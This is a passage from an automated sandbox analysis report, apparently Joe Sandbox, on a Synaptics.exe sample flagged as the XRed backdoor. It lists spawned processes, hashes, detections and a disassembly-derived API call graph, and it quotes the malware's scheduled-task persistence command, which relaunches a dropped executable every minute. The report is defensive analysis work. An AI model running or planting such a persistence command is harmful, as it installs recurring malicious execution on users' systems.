                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:05:22:56
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:771'584 bytes
                                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:05:22:57
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                      Imagebase:0xab0000
                                                                                                                                      File size:53'161'064 bytes
                                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                                                                                                                                      Imagebase:0x880000
                                                                                                                                      File size:147'456 bytes
                                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                                                                                                                                      Imagebase:0xd00000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:05:22:59
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:05:23:09
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:05:23:18
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:771'584 bytes
                                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:05:23:26
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:05:23:35
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:05:23:43
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                                                                                                                                      Imagebase:0xf0000
                                                                                                                                      File size:483'680 bytes
                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:05:24:01
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:10.7%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:40
                                                                                                                                        execution_graph 104040 770ff7 104498 77e016 104040->104498 104042 77100d 104507 77e08f 104042->104507 104046 78010a 48 API calls 104077 76fad8 Mailbox _memmove 104046->104077 104048 77105e 104538 76c935 104048->104538 104049 771063 104545 7ad520 86 API calls 4 library calls 104049->104545 104050 76c935 48 API calls 104050->104077 104052 770dee 104520 76d89e 104052->104520 104053 770dfa 104059 76d89e 50 API calls 104053->104059 104055 7db772 104547 7ad520 86 API calls 4 library calls 104055->104547 104056 770119 104546 7ad520 86 API calls 4 library calls 104056->104546 104060 770e83 104059->104060 104530 76caee 104060->104530 104062 76d3d2 48 API calls 104062->104077 104063 7db7d2 104065 781b2a 52 API calls __cinit 104065->104077 104067 77103d 104070 76fbf1 Mailbox 104067->104070 104544 7ad520 86 API calls 4 library calls 104067->104544 104073 7710f1 Mailbox 104543 7ad520 86 API calls 4 library calls 104073->104543 104075 7db583 104542 7ad520 86 API calls 4 library calls 104075->104542 104077->104046 104077->104048 104077->104049 104077->104050 104077->104052 104077->104053 104077->104055 104077->104056 104077->104060 104077->104062 104077->104065 104077->104067 104077->104070 104077->104073 104077->104075 104078 79a599 InterlockedDecrement 104077->104078 104095 76f6d0 104077->104095 104167 76fa40 104077->104167 104221 7b013f 104077->104221 104234 77dd84 104077->104234 104237 7c804e 104077->104237 104251 77f461 104077->104251 104289 7c17aa 104077->104289 104294 7c0bfa 104077->104294 104297 7c10e5 104077->104297 104303 7b9122 104077->104303 104317 7c1f19 104077->104317 104320 7b92c0 104077->104320 104338 77ef0d 104077->104338 104381 7bb74b VariantInit 104077->104381 104422 77f03e 104077->104422 104425 7b8065 GetCursorPos GetForegroundWindow 104077->104425 104439 7c30ad 104077->104439 104493 7c798d 104077->104493 104519 771620 59 API calls Mailbox 104077->104519 104534 7bee52 82 API calls 2 library calls 104077->104534 104535 7bef9d 90 API calls Mailbox 104077->104535 104536 7ab020 48 API calls 104077->104536 104537 7be713 415 API calls Mailbox 104077->104537 104078->104077 104096 76f708 104095->104096 104101 76f77b 104095->104101 104097 76f712 104096->104097 104098 7dc4d5 104096->104098 104099 76f71c 104097->104099 104120 7dc544 104097->104120 104103 7dc4f4 104098->104103 104104 7dc4e2 104098->104104 104109 7dc6a4 104099->104109 104115 76f72a 104099->104115 104121 76f741 104099->104121 104100 76fa40 415 API calls 104142 76f787 104100->104142 104102 7dc253 104101->104102 104101->104142 104587 7ad520 86 API calls 4 library calls 104102->104587 104592 7bc235 415 API calls Mailbox 104103->104592 104548 7bf34f 104104->104548 104105 7dc585 104117 7dc5a4 104105->104117 104118 7dc590 104105->104118 104112 76c935 48 API calls 104109->104112 104110 7dc264 104110->104077 104111 7dc507 104114 7dc50b 104111->104114 104111->104121 104112->104121 104593 7ad520 86 API calls 4 library calls 104114->104593 104115->104121 104694 79a599 InterlockedDecrement 104115->104694 104116 76f770 Mailbox 104116->104077 104595 7bd154 48 API calls 104117->104595 104122 7bf34f 415 API calls 104118->104122 104120->104105 104134 7dc569 104120->104134 104121->104116 104126 7dc7b5 104121->104126 104695 7bee52 82 API calls 2 library calls 104121->104695 104122->104121 104124 782241 48 API calls 104124->104142 104125 7dc45a 104128 76c935 48 API calls 104125->104128 104133 7dc7eb 104126->104133 104716 7bef9d 90 API calls Mailbox 104126->104716 104127 7dc5af 104141 7dc62c 104127->104141 104151 7dc5d1 104127->104151 104128->104121 104132 76f84a 104136 7dc32a 104132->104136 104148 76f854 104132->104148 104138 76d89e 50 API calls 104133->104138 104594 7ad520 86 API calls 4 library calls 104134->104594 104135 7dc793 104696 7684a6 104135->104696 104588 76342c 48 API calls 104136->104588 104138->104116 104621 7aafce 48 API calls 104141->104621 104142->104100 104142->104116 104142->104124 104142->104132 104145 76f8bb 104142->104145 104152 76f9d8 104142->104152 104143 7dc7c9 104147 7684a6 81 API calls 104143->104147 104145->104110 104145->104121 104145->104125 104589 79a599 InterlockedDecrement 104145->104589 104591 7bf4df 415 API calls 104145->104591 104159 7dc7d1 __wsetenvp 104147->104159 104571 7714a0 104148->104571 104150 76f8ab 104150->104145 104150->104152 104596 7aa485 48 API calls 104151->104596 104590 7ad520 86 API calls 4 library calls 104152->104590 104154 7dc79b __wsetenvp 104154->104126 104157 76d89e 50 API calls 104154->104157 104155 7dc63e 104622 77df08 48 API calls 104155->104622 104157->104126 104159->104133 104162 76d89e 50 API calls 104159->104162 104160 7dc647 Mailbox 104623 7aa485 48 API calls 104160->104623 104161 7dc5f6 104597 7744e0 104161->104597 104162->104133 104165 7dc663 104624 773680 104165->104624 104168 76fa60 104167->104168 104176 76fa8e Mailbox _memmove 104167->104176 104169 78010a 48 API calls 104168->104169 104169->104176 104170 77105e 104171 76c935 48 API calls 104170->104171 104177 76fbf1 Mailbox 104171->104177 104172 76d3d2 48 API calls 104172->104176 104175 78010a 48 API calls 104175->104176 104176->104170 104176->104172 104176->104175 104176->104177 104178 76c935 48 API calls 104176->104178 104179 771063 104176->104179 104181 770dee 104176->104181 104183 770119 104176->104183 104184 76f6d0 415 API calls 104176->104184 104187 79a599 InterlockedDecrement 104176->104187 104188 770e83 104176->104188 104189 7db772 104176->104189 104190 770dfa 104176->104190 104192 781b2a 52 API calls __cinit 104176->104192 104198 771230 104176->104198 104199 76fa40 415 API calls 104176->104199 104201 7710f1 Mailbox 104176->104201 104203 7db583 104176->104203 104205 7b013f 87 API calls 104176->104205 104206 7c1f19 132 API calls 104176->104206 104207 7c0bfa 129 API calls 104176->104207 104208 77f03e 2 API calls 104176->104208 104209 7bb74b 415 API calls 104176->104209 104210 7c798d 109 API calls 104176->104210 104211 7c30ad 93 API calls 104176->104211 104212 7c804e 113 API calls 104176->104212 104213 77dd84 3 API calls 104176->104213 104214 7c17aa 87 API calls 104176->104214 104215 77f461 98 API calls 104176->104215 104216 7b9122 91 API calls 104176->104216 104217 7c10e5 82 API calls 104176->104217 104218 77ef0d 94 API calls 104176->104218 104219 7b92c0 88 API calls 104176->104219 104220 7b8065 55 API calls 104176->104220 105642 771620 59 API calls Mailbox 104176->105642 105643 7bee52 82 API calls 2 library calls 104176->105643 105644 7bef9d 90 API calls Mailbox 104176->105644 105645 7ab020 48 API calls 104176->105645 105646 7be713 415 API calls Mailbox 104176->105646 104177->104077 104178->104176 105650 7ad520 86 API calls 4 library calls 104179->105650 104182 76d89e 50 API calls 104181->104182 104182->104190 105651 7ad520 86 API calls 4 library calls 104183->105651 104184->104176 104185 76d89e 50 API calls 104185->104188 104187->104176 104194 76caee 48 API calls 104188->104194 105652 7ad520 86 API calls 4 library calls 104189->105652 104190->104185 104192->104176 104193 7db7d2 104194->104201 104198->104177 105649 7ad520 86 API calls 4 library calls 104198->105649 104199->104176 105648 7ad520 86 API calls 4 library calls 104201->105648 105647 7ad520 86 API calls 4 library calls 104203->105647 104205->104176 104206->104176 104207->104176 104208->104176 104209->104176 104210->104176 104211->104176 104212->104176 104213->104176 104214->104176 104215->104176 104216->104176 104217->104176 104218->104176 104219->104176 104220->104176 104222 7b015e 104221->104222 104223 7b0157 104221->104223 104224 7684a6 81 API calls 104222->104224 104225 7684a6 81 API calls 104223->104225 104224->104223 104226 7b017c 104225->104226 105653 7a76db GetFileVersionInfoSizeW 104226->105653 104228 7b018d 104229 7b0192 104228->104229 104231 7b01a3 _wcscmp 104228->104231 104230 76ca8e 48 API calls 104229->104230 104233 7b01a1 104230->104233 104232 76ca8e 48 API calls 104231->104232 104232->104233 104233->104077 105669 77dd92 GetFileAttributesW 104234->105669 105674 7619ee 104237->105674 104242 7c806f 104246 76ca8e 48 API calls 104242->104246 104243 7c8091 104244 76d3d2 48 API calls 104243->104244 104245 7c809a 104244->104245 105700 79e2e8 104245->105700 104248 7c808f Mailbox 104246->104248 104248->104077 104249 7c80aa 105717 767bef 104249->105717 104252 77f47f 104251->104252 104253 77f48a 104251->104253 104254 76cdb4 48 API calls 104252->104254 104256 7684a6 81 API calls 104253->104256 104278 77f498 Mailbox 104253->104278 104254->104253 104255 78010a 48 API calls 104257 77f49f 104255->104257 104258 7d6841 104256->104258 104259 77f4af 104257->104259 105848 765080 49 API calls 104257->105848 104260 78297d __wsplitpath 47 API calls 104258->104260 104262 7684a6 81 API calls 104259->104262 104263 7d6859 104260->104263 104264 77f4bf 104262->104264 104265 76caee 48 API calls 104263->104265 104266 764bf9 56 API calls 104264->104266 104267 7d686a 104265->104267 104268 77f4ce 104266->104268 105849 7639e8 48 API calls 2 library calls 104267->105849 104270 7d68d4 GetLastError 104268->104270 104282 77f4d6 104268->104282 104273 7d68ed 104270->104273 104271 7d6878 104272 7d6895 104271->104272 105850 7a6f4b GetFileAttributesW FindFirstFileW FindClose 104271->105850 104274 76cdb4 48 API calls 104272->104274 104273->104282 105851 764592 CloseHandle 104273->105851 104274->104278 104275 77f4f0 104279 78010a 48 API calls 104275->104279 104276 7d6920 104280 78010a 48 API calls 104276->104280 104278->104255 104288 77f50a Mailbox 104278->104288 104284 77f4f5 104279->104284 104285 7d6925 104280->104285 104281 7d6888 104281->104272 104287 7a6d6d 52 API calls 104281->104287 104282->104275 104282->104276 104286 76197e 48 API calls 104284->104286 104286->104288 104287->104272 104288->104077 104290 7684a6 81 API calls 104289->104290 104291 7c17c7 104290->104291 104292 7a6f5b 63 API calls 104291->104292 104293 7c17d8 104292->104293 104293->104077 105852 7bf79f 104294->105852 104296 7c0c0a 104296->104077 104298 7684a6 81 API calls 104297->104298 104299 7c10fb LoadLibraryW 104298->104299 104300 7c111e 104299->104300 104301 7c110f 104299->104301 104300->104301 105940 7c28d9 48 API calls _memmove 104300->105940 104301->104077 104304 7684a6 81 API calls 104303->104304 104305 7b913f 104304->104305 104306 76cdb4 48 API calls 104305->104306 104307 7b9149 104306->104307 105941 7bacd3 104307->105941 104309 7b9156 104310 7b915a socket 104309->104310 104311 7b9182 104309->104311 104312 7b916d WSAGetLastError 104310->104312 104313 7b9184 connect 104310->104313 104311->104077 104312->104311 104313->104311 104314 7b91a3 WSAGetLastError 104313->104314 105947 7ad7e4 104314->105947 104316 7b91b8 closesocket 104316->104311 105962 7c23c5 104317->105962 104321 76a6d4 48 API calls 104320->104321 104322 7b92d2 104321->104322 104323 7684a6 81 API calls 104322->104323 104324 7b92e1 104323->104324 104325 77f26b 50 API calls 104324->104325 104326 7b92ed gethostbyname 104325->104326 104327 7b92fa WSAGetLastError 104326->104327 104328 7b931d _memmove 104326->104328 104329 7b930e 104327->104329 104330 7b932d inet_ntoa 104328->104330 104331 76ca8e 48 API calls 104329->104331 106046 7badca 48 API calls 2 library calls 104330->106046 104333 7b931b Mailbox 104331->104333 104333->104077 104334 7b9342 106047 7bae5a 50 API calls 104334->106047 104336 7b934e 104337 767bef 48 API calls 104336->104337 104337->104333 104339 76ca8e 48 API calls 104338->104339 104340 77ef25 104339->104340 104341 77ef3e 104340->104341 104342 77effb 104340->104342 106071 77f0f3 48 API calls 104341->106071 104343 78010a 48 API calls 104342->104343 104345 77f002 104343->104345 104346 77f00e 104345->104346 106073 765080 49 API calls 104345->106073 104350 7684a6 81 API calls 104346->104350 104348 77ef73 104352 77f03e 2 API calls 104348->104352 104349 77ef4d 104349->104348 104353 7d6942 104349->104353 104354 76cdb4 48 API calls 104349->104354 104351 77f01c 104350->104351 104355 764bf9 56 API calls 104351->104355 104356 77ef7a 104352->104356 104353->104077 104357 7d6965 104354->104357 104359 77f02b 104355->104359 104360 77ef87 104356->104360 104361 7d6980 104356->104361 104357->104348 104358 7d696d 104357->104358 104362 76cdb4 48 API calls 104358->104362 104359->104349 104363 7d6936 104359->104363 104365 76d3d2 48 API calls 104360->104365 104364 78010a 48 API calls 104361->104364 104362->104356 104363->104353 106074 764592 CloseHandle 104363->106074 104366 7d6986 104364->104366 104367 77ef8f 104365->104367 104368 7d699f 104366->104368 106075 763d65 ReadFile SetFilePointerEx 104366->106075 106048 77f04e 104367->106048 104375 7d69a3 _memmove 104368->104375 106076 7aad14 48 API calls _memset 104368->106076 104372 77ef9e 104374 767bef 48 API calls 104372->104374 104372->104375 104376 77efb2 Mailbox 104374->104376 104377 77eff2 104376->104377 104378 7650ec CloseHandle 104376->104378 104377->104077 104379 77efe4 104378->104379 106072 764592 CloseHandle 104379->106072 104382 76ca8e 48 API calls 104381->104382 104383 7bb7a3 CoInitialize 104382->104383 104384 7bb7ae CoUninitialize 104383->104384 104385 7bb7b4 104383->104385 104384->104385 104386 7bb7d5 104385->104386 104388 76ca8e 48 API calls 104385->104388 104387 7bb81b 104386->104387 104389 7684a6 81 API calls 104386->104389 104390 7684a6 81 API calls 104387->104390 104388->104386 104391 7bb7ef 104389->104391 104392 7bb827 104390->104392 106100 79a857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 104391->106100 104396 7bb9d3 SetErrorMode CoGetInstanceFromFile 104392->104396 104405 7bb861 104392->104405 104394 7bb802 104394->104387 104395 7bb807 104394->104395 106101 7bc235 415 API calls Mailbox 104395->106101 104397 7bba19 SetErrorMode 104396->104397 104398 7bba1f CoGetObject 104396->104398 104419 7bb9b1 104397->104419 104398->104397 104402 7bbaa8 104398->104402 104400 7bb8a8 GetRunningObjectTable 104403 7bb8b8 104400->104403 104404 7bb8cb 104400->104404 106106 7bc235 415 API calls Mailbox 104402->106106 104403->104404 104421 7bb8ed 104403->104421 106102 7bc235 415 API calls Mailbox 104404->106102 104405->104400 104410 7bb89a 104405->104410 104413 76cdb4 48 API calls 104405->104413 104407 7bbad0 VariantClear 104407->104077 104409 7bb814 Mailbox 104409->104407 104410->104400 104411 7bbac2 SetErrorMode 104411->104409 104412 7bba53 104414 7bba6f 104412->104414 106104 79ac4b 51 API calls Mailbox 104412->106104 104416 7bb88a 104413->104416 106105 7aa6f6 103 API calls 104414->106105 104416->104410 104418 76cdb4 48 API calls 104416->104418 104418->104410 104419->104402 104419->104412 104421->104419 106103 79ac4b 51 API calls Mailbox 104421->106103 104423 77f0b5 2 API calls 104422->104423 104424 77f046 104423->104424 104424->104077 106107 7b6b19 104425->106107 104428 7b80a5 104429 763320 48 API calls 104428->104429 104430 7b80b3 104429->104430 106112 772320 50 API calls 104430->106112 104431 7b8102 104433 76cdb4 48 API calls 104431->104433 104438 7b80f5 104431->104438 104435 7b812b 104433->104435 104434 7b80cf 106113 772320 50 API calls 104434->106113 104437 76cdb4 48 API calls 104435->104437 104435->104438 104437->104438 104438->104077 104440 76ca8e 48 API calls 104439->104440 104441 7c30ca 104440->104441 104442 76d3d2 48 API calls 104441->104442 104443 7c30d3 104442->104443 104444 76d3d2 48 API calls 104443->104444 104445 7c30dc 104444->104445 104446 76d3d2 48 API calls 104445->104446 104447 7c30e5 104446->104447 104448 7684a6 81 API calls 104447->104448 104449 7c30f4 104448->104449 104450 7c3d7b 48 API calls 104449->104450 104451 7c3128 104450->104451 104452 7c3af7 49 API calls 104451->104452 104453 7c3159 104452->104453 104454 7c319c RegOpenKeyExW 104453->104454 104455 7c3172 RegConnectRegistryW 104453->104455 104465 7c315d Mailbox 104453->104465 104457 7c31f7 104454->104457 104459 7c31c5 104454->104459 104455->104454 104455->104465 104458 7684a6 81 API calls 104457->104458 104460 7c3207 RegQueryValueExW 104458->104460 104461 7c31d9 RegCloseKey 104459->104461 104459->104465 104462 7c323e 104460->104462 104491 7c3229 104460->104491 104461->104465 104463 7c344c 104462->104463 104464 7c3265 104462->104464 104462->104491 104469 78010a 48 API calls 104463->104469 104467 7c326e 104464->104467 104468 7c33d9 104464->104468 104465->104077 104466 7c34eb RegCloseKey 104466->104465 104471 7c34fe RegCloseKey 104466->104471 104473 7c338d 104467->104473 104474 7c3279 104467->104474 106114 7aad14 48 API calls _memset 104468->106114 104470 7c3464 104469->104470 104475 7684a6 81 API calls 104470->104475 104471->104465 104479 7684a6 81 API calls 104473->104479 104477 7c32de 104474->104477 104478 7c327e 104474->104478 104481 7c3479 RegQueryValueExW 104475->104481 104476 7c33e4 104482 7684a6 81 API calls 104476->104482 104480 78010a 48 API calls 104477->104480 104486 7684a6 81 API calls 104478->104486 104478->104491 104483 7c33a1 RegQueryValueExW 104479->104483 104484 7c32f7 104480->104484 104481->104491 104492 7c3331 104481->104492 104485 7c33f6 RegQueryValueExW 104482->104485 104483->104491 104487 7684a6 81 API calls 104484->104487 104485->104466 104485->104491 104488 7c329f RegQueryValueExW 104486->104488 104489 7c330c RegQueryValueExW 104487->104489 104488->104491 104489->104491 104489->104492 104490 76ca8e 48 API calls 104490->104491 104491->104466 104492->104490 104494 7619ee 83 API calls 104493->104494 104495 7c799b 104494->104495 104496 761dce 107 API calls 104495->104496 104497 7c79a4 104496->104497 104497->104077 104499 77e034 104498->104499 104500 77e022 104498->104500 104502 77e063 104499->104502 104503 77e03a 104499->104503 104501 76d89e 50 API calls 104500->104501 104506 77e02c 104501->104506 104505 76d89e 50 API calls 104502->104505 104504 78010a 48 API calls 104503->104504 104504->104506 104505->104506 104506->104042 106115 767b6e 48 API calls 104507->106115 104509 77e0b4 _wcscmp 104510 77e0e2 Mailbox 104509->104510 104511 76caee 48 API calls 104509->104511 104510->104077 104512 7db9c7 104511->104512 106116 767b4b 48 API calls Mailbox 104512->106116 104514 7db9d5 104515 76d2d2 53 API calls 104514->104515 104516 7db9e7 104515->104516 104517 76d89e 50 API calls 104516->104517 104518 7db9ec Mailbox 104516->104518 104517->104518 104518->104077 104519->104077 104521 76d8ac 104520->104521 104528 76d8db Mailbox 104520->104528 104522 76d8ff 104521->104522 104524 76d8b2 Mailbox 104521->104524 104523 76c935 48 API calls 104522->104523 104523->104528 104525 76d8c7 104524->104525 104526 7d4e9b 104524->104526 104527 7d4e72 VariantClear 104525->104527 104525->104528 104526->104528 106117 79a599 InterlockedDecrement 104526->106117 104527->104528 104528->104053 104531 76cafd __wsetenvp _memmove 104530->104531 104532 78010a 48 API calls 104531->104532 104533 76cb3b 104532->104533 104533->104073 104534->104077 104535->104077 104536->104077 104537->104077 104539 76c940 104538->104539 104540 76c948 104538->104540 104541 76d805 48 API calls 104539->104541 104540->104070 104541->104540 104542->104073 104543->104070 104544->104049 104545->104056 104546->104055 104547->104063 104717 76d3d2 104548->104717 104550 7bf389 Mailbox 104552 7bf3cd 104550->104552 104553 7bf3e1 104550->104553 104567 7bf3a9 104550->104567 104551 76d89e 50 API calls 104568 7bf421 Mailbox 104551->104568 104728 767e53 104552->104728 104555 76c935 48 API calls 104553->104555 104556 7bf3df 104555->104556 104557 7bf429 104556->104557 104737 7bcdb5 415 API calls 104556->104737 104722 7bcd12 104557->104722 104560 7bf410 104560->104557 104562 7bf414 104560->104562 104561 7bf44b 104564 7bf4a2 104561->104564 104565 7bf457 104561->104565 104738 7ad338 86 API calls 4 library calls 104562->104738 104566 7bf34f 415 API calls 104564->104566 104565->104567 104569 7bf476 104565->104569 